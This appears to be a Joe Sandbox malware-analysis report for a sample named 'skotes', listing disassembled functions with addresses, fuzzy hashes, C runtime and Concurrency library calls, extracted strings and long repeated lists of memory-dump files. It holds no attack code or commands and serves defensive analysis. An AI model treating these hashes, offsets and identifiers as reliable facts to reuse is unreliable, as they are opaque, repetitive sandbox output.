Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: c6a6bbd64d43b0009f90385b77d647463a6897833b06ef89f48b6cbac80b40ea
Instruction ID: d63153f8e184c87217772d048e642a1a755ec7e19ac5f582c922cec4b0733a31
Opcode Fuzzy Hash: c6a6bbd64d43b0009f90385b77d647463a6897833b06ef89f48b6cbac80b40ea
Instruction Fuzzy Hash: 3121A7B2A04205EFCF14DE68DD4AFEA77B8FB44724B148519F91197282DB39ED0096A1

Function 0079BB72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0079BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0079BBE4
_xtime_get.LIBCPMT ref: 0079BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0079BC13

Strings

=L-t, xrefs: 0079BB78

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID: =L-t
API String ID: 531285432-768041998
Opcode ID: 8ecdf41991ada2f69b570c74f77b9a10266491e9c3e45c85a1393350eadb7cda
Instruction ID: 0353687fc318050c3c4c9c49816dd2f58225c7543bd1bafa4354c0ae6a7fb851
Opcode Fuzzy Hash: 8ecdf41991ada2f69b570c74f77b9a10266491e9c3e45c85a1393350eadb7cda
Instruction Fuzzy Hash: F1213272A01119EFDF01EFA4ED859BEB7B9EF09710F104015F501B7291DB38AD019BA0

Function 007AA026 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 007AA069

Part of subcall function 007AB560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 007AB5AF

Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 007AA07F
Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 007AA0CB

Part of subcall function 007AAB41: List.LIBCONCRT ref: 007AAB77

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 007AA0DB

Strings

=L-t, xrefs: 007AA02C

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
String ID: =L-t
API String ID: 932774601-768041998
Opcode ID: 0595b87a9fd9c779ca9a6a826b9c6f4e9dd51fa1cfc4155457ee4ea2dff10dce
Instruction ID: 031fcaf14c0c7bd9284c7ab34199785582a440e1dc14b497d2fc0a0298b79120
Opcode Fuzzy Hash: 0595b87a9fd9c779ca9a6a826b9c6f4e9dd51fa1cfc4155457ee4ea2dff10dce
Instruction Fuzzy Hash: 1C21BD31900614EFCB24EF65D8908ABF3F9FF897007004A5EE442A7651EB38F905CBA2

Function 007B727C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 007B72BE

Strings

.com, xrefs: 007B72FE
.exe, xrefs: 007B72CB
.bat, xrefs: 007B72ED
.cmd, xrefs: 007B72DC

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: a71335734e1e795e863cd4126cc5a286f7f4bc39eb6daf4c3fd8d02eccd51576
Instruction ID: 1c6b9cba3318462d8c91e7c4c142fba8e6f8e706619bfecb19edf701267445a8
Opcode Fuzzy Hash: a71335734e1e795e863cd4126cc5a286f7f4bc39eb6daf4c3fd8d02eccd51576
Instruction Fuzzy Hash: DF01262770866235661C50589D06BF617E88BD2BB4B25002BFC54F76C2EF8DDD43A1A0

Function 0079FA71 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0079FB06

Strings

SetThreadGroupAffinity, xrefs: 0079FA87
kernel32.dll, xrefs: 0079FA7A
GetCurrentProcessorNumberEx, xrefs: 0079FABE
GetThreadGroupAffinity, xrefs: 0079FA93

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
API String ID: 348560076-465693683
Opcode ID: 4c4b1a46b90ed9d29fcbfc88f57ba58f61723eecaee91e020730db3d51e90e9b
Instruction ID: cedabd15144b95d00403177c76fdb172bd96ab004b78f19060dd346b59a07f99
Opcode Fuzzy Hash: 4c4b1a46b90ed9d29fcbfc88f57ba58f61723eecaee91e020730db3d51e90e9b
Instruction Fuzzy Hash: C00168A5751305BEA7187774AC8FEAB2AECCD46314730493BF440E7252EDADD80042A4

Function 007B2097 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 007B20B7

Part of subcall function 007ACAF3: Mailbox.LIBCMT ref: 007ACB2D

Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 007B20C8
StructuredWorkStealingQueue.LIBCMT ref: 007B20FE
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 007B210F

Strings

e, xrefs: 007B20D9

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
String ID: e
API String ID: 1411586358-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: 3af69f29a8680314772264f7bb0171cb5d4e9b4d86c0bb6a6bab60fab8c71920
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: 6C118231502109EBDB15DE6DC8857EB73A4EF02364B24815ABC069F103DA79D902CBA0

Function 0079D029 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

___scrt_fastfail.LIBCMT ref: 0079D0A5

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 0079D03B
WakeAllConditionVariable, xrefs: 0079D069
kernel32.dll, xrefs: 0079D04C
SleepConditionVariableCS, xrefs: 0079D05D

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
